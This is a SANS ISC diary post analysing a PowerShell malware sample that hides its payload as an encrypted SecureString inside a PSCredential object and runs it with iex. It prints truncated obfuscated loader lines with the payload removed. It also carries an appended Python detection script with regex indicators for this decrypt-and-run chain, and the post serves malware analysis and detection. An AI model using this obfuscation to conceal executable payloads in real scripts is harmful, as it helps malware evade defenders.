SANS ISC: InfoSec Handlers Diary Blog



Powershell Payload Stored in a PSCredential Object

Published: 2020-04-27
Last Updated: 2020-04-27 06:44:36 UTC
by Xavier Mertens (Version: 1)

An interesting obfuscation technique to hide a malicious payload in a PowerShell script: store it in a PSCredential object!

The PSCredential[1] class can be used to manage credentials in a centralized way. Just have a look at this example.

First, let's encrypt our strong password:

PS C:\Users\REM> $password = ConvertTo-SecureString 'MyStr0ngP4ssw0rd' -AsPlainText -Force
PS C:\Users\REM> $password
System.Security.SecureString

Now, we can create the PSCredential object:

PS C:\Users\REM> $credential = New-Object System.Management.Automation.PSCredential ('admin', $password)
PS C:\Users\REM> $credential

UserName                     Password
--------                     --------
admin    System.Security.SecureString

To get the password in cleartext, just do this:

PS C:\Users\REM> $credential.GetNetworkCredential().Password
MyStr0ngP4ssw0rd

The sample that I found implements the same technique but, as you can expect now, the password is not a simple string but PowerShell code that can be processed via 'IEX'. Here is the code sample:

( NEw-ObJECT manaGEMeNT.AUtomatiON.pScreDENtial  ' ', ( '
(...code removed...)
'|cOnVErtTo-seCUreSTriNG -KeY (1..32) )).getnETwoRKcrEDEnTiaL().PAsSWOrD | iex

I removed most of the data for more readability. The complete code is approximately 70KB.

Note the call to ConvertTo-SecureString with -Key (1..32). It is mandatory here: the long string stored in the script is not the code itself but its encrypted SecureString form, so it has to be converted back into a SecureString before the PSCredential object can expose it through GetNetworkCredential().Password. Since the key is hard-coded in the script as the bytes 1..32, this is obfuscation rather than protection: anyone holding the script can recover the payload. You can compare this use of ConvertTo-SecureString to decoding a Base64 chunk of data.

Here is the content of the "password" (the decrypted script, itself obfuscated by storing the code reversed and reading it back with a right-to-left regex):

. ( $VERBOSePRefereNCe.toSTRiNG()[1,3]+'X'-join'')( [sTRInG]::join( '' ,([rEGEX]::mAtchEs( ") )63]RAHc[]GniRts[,)96]RAHc[+79]RAHc[+201]RAHc[(
(...hex-encoded byte array removed for readability...)
 fubEaf ]][etyB[{)WsB46DMAWsB qe- '+']iWyERUTCETIHCRA_ROSSECORPiWy[selbairaVtnemnorivnE.ofnItratS.kcu'+'femosEaf( fi'(( )'x'+]31[DiLLeHs$+]1[D
iLleHs$ ( & " ,'.', 'R'+'ig'+'hTTOLe'+'FT')| foreAch{$_.vAlUE })) )

If you're interested in this technique, the file is available on VT (SHA256:ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302) with a score of 6/59[2].

Based on this, I added 'Management.Automation.PSCredential' and 'ConvertTo-SecureString' to the list of suspicious strings to track in PowerShell scripts!
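As an added example (not code from the diary), here is a small Python triage check that applies the two strings now on the watch list and the other links of the decrypt-and-run chain seen in the sample: case-randomised cmdlet names, ConvertTo-SecureString with an in-script -Key, GetNetworkCredential().Password, a trailing iex, and the IEX alias rebuilt from $VerbosePreference as in the decrypted payload. Both script snippets are constructed, and the encrypted blob is a placeholder.

```python
import re

# Constructed sample in the shape of the diary's one-liner: mixed-case cmdlet
# names, a -Key-decrypted string fed to PSCredential, password piped to iex.
# The blob is a placeholder, not the real encrypted data.
SAMPLE_MALICIOUS = (
    "( NEw-ObJECT manaGEMeNT.AUtomatiON.pScreDENtial ' ', ( 'PLACEHOLDER_BLOB'"
    "|cOnVErtTo-seCUreSTriNG -KeY (1..32) )).getnETwoRKcrEDEnTiaL().PAsSWOrD | iex"
)

# Constructed benign admin snippet: PSCredential used for what it is meant for.
SAMPLE_BENIGN = (
    "$pw = Read-Host -AsSecureString\n"
    "$cred = New-Object System.Management.Automation.PSCredential ('admin', $pw)\n"
    "Get-WmiObject Win32_OperatingSystem -Credential $cred"
)

# All patterns are case-insensitive because the sample randomises letter case.
INDICATORS = {
    # the two strings added to the watch list in the diary
    "pscredential": re.compile(r"management\.automation\.pscredential", re.I),
    "securestring": re.compile(r"convertto-securestring\b", re.I),
    # -Key means the AES key ships inside the script (decryptable offline)
    "securestring_key": re.compile(r"convertto-securestring\s+-k(ey)?\b", re.I),
    # plaintext extraction from the credential object
    "netcred_password": re.compile(r"getnetworkcredential\(\)\s*\.\s*password", re.I),
    # execution primitive: iex / Invoke-Expression ...
    "iex": re.compile(r"(?:\||;|\(|^)\s*(?:iex|invoke-expression)\b", re.I | re.M),
    # ... or the alias rebuilt from $VerbosePreference ("SilentlyContinue"[1,3] + 'X')
    "iex_verbosepref": re.compile(r"verbosepreference\.tostring\(\)\s*\[\s*1\s*,\s*3\s*\]", re.I),
}


def score_script(text: str) -> dict:
    """Flag one PowerShell script: which indicators fire and an overall verdict."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    executes = hits["iex"] or hits["iex_verbosepref"]
    # Full decrypt-and-run chain: credential object + in-script key
    # + plaintext extraction + execution primitive.
    chain = hits["pscredential"] and hits["securestring_key"] and hits["netcred_password"] and executes
    if chain:
        verdict = "payload-in-pscredential"
    elif hits["pscredential"] and hits["securestring"]:
        verdict = "review"  # both watch-list strings present, but no execution chain
    else:
        verdict = "benign"
    return {"hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, script in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, score_script(script)["verdict"])
```

The "review" verdict is where a plain watch list on the two strings would stop; requiring the whole chain keeps ordinary credential handling out of the alert queue.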

[1] https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.pscredential?view=pscore-6.2.0
[2] https://www.virustotal.com/gui/file/ead30df7867c2bcb99de71c1686e82d49c6fcc3ba00092a9fc8d878b78c62302/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
